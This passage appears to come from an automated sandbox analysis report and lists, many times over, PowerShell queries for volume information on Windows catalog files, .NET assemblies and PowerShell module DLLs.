                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
